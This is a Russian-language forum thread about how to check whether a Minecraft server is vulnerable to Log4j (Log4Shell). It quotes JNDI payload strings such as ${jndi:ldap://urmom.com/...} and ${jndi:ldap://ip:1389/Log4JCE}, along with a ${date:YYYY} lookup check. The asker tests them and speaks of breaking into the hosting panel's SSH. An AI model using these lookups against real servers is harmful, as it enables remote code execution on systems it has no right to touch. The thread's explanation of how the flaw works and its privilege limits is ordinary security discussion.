Уязвимость Log4j как узнать что сервер уязвим?

[nilas]

каким образом проверить что могут взломать сервер?
или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?

 

[nilas]

Придется открывать IP на компудахтере, что логично хреновый вариант

Объединено 29 Июн 2022

IP бл... порты!

ну зачем мне ломать свой пк? я не понимаю этого
что за запутанность то такая?
разве не тупо вводишь в консоль сервера(который на хостинге) например:say ${sh start.sh) то начинается исполняться скрипт на панельном хосте.

 

[Overwrite]

ну зачем мне ломать свой пк? я не понимаю этого

Да какой свой господе! Ну чего не понятного.
${jndi:ldap://urmom.com/log4jtobipizda} = "Привет сервер, выполни код по ссылке urmom.com/log4jtobipizda"

 

[nilas]

Да какой свой господе! Ну чего не понятного.
${jndi:ldap/urmom.com/log4jtobipizda} = "Привет сервер, выполни код по ссылке urmom.com/log4jtobipizda"

${jndi:ldap://.ip компа:1398/Log4JCE} обращается к компу на котором сервер Log4JCE? тогда почему на видео ломают свой пк а не сервер?

 

[Overwrite]

тогда почему на видео ломают свой пк а не сервер?

Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?

 

[nilas]

Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?

получается работает так:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?

 

[Overwrite]

:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?

Ну если мы думаем одинаково то да

 

[nilas]

Ну если мы думаем одинаково то да

ну а то что на видео ломали свой пк:это потому что сервер на их пк работал?

 

[Overwrite]

это потому что сервер на их пк работал?

Это по тому что майнкрафт использует ту же систему логгирования что и сервера.

Объединено 29 Июн 2022

Кароче мы отклонились от темы. Суть проста. Лукапы. /say ${date:YYYY} - лукап. Если лукап работает, т.е. дата выбивается - сервер с вероятностью 90% подвержен взлому.

 

[nilas]

Это по тому что майнкрафт использует ту же систему логгирования что и сервера.

Объединено 29 Июн 2022

Кароче мы отклонились от темы. Суть проста. Лукапы. /say ${date:YYYY} - лукап. Если лукап работает, т.е. дата выбивается - сервер с вероятностью 90% подвержен взлому.

Дата выбивалась,буду проверять получится ли ломануть.

 

[Overwrite]

Дата выбивалась,буду проверять получится ли ломануть.

Ну тут уже надо шарить

 

[nilas]

не робит,ввожу в консоль:say ${jndi:ldap://ip machine:1389/Log4JCE} выводит это: [Server thread/INFO]: [Server] Reference Class Name: foo

 

[Overwrite]

не робит,ввожу в консоль:say ${jndi:ldap://ip machine:1389/Log4JCE} выводит это: [Server thread/INFO]: [Server] Reference Class Name: foo

Ну так да, сервер исполняет этот класс

 

[nilas]

Ну так да, сервер исполняет этот класс

Так что не взломать SSH у панельного хоста.
Как и не запустить какието программы через этот способ.

 

[Overwrite]

Так что не взломать SSH у панельного хоста.

О чем ты думал, если у тебя юзер у которого ни на что нет прав?

Объединено 1 Июл 2022

При помощи log4shell ты можешь сделать что-то реальное только если сервер запущен от рута или юзера с реальными правами. Если у тебя тупо хост, у которого более чем на запуск сервера ни на что прав нет, то ты ничего не сделаешь.
Если бы так было можно, удалить все сервера можно было бы при помощи обычного плагина и кода Runtime.getRuntime().exec()

 

[nilas]

О чем ты думал, если у тебя юзер у которого ни на что нет прав?

Объединено 1 Июл 2022

При помощи log4shell ты можешь сделать что-то реальное только если сервер запущен от рута или юзера с реальными правами. Если у тебя тупо хост, у которого более чем на запуск сервера ни на что прав нет, то ты ничего не сделаешь.
Если бы так было можно, удалить все сервера можно было бы при помощи обычного плагина и кода Runtime.getRuntime().exec()

мб код не правильный? вбивал в Log4jRCE.java такой код:

Авторизуйтесь для просмотра ссылок.

 

[Overwrite]

мб код не правильный? вбивал в Log4jRCE.java такой код:

Авторизуйтесь для просмотра ссылок.

Я думаю тебе в даркнет с такими вопросами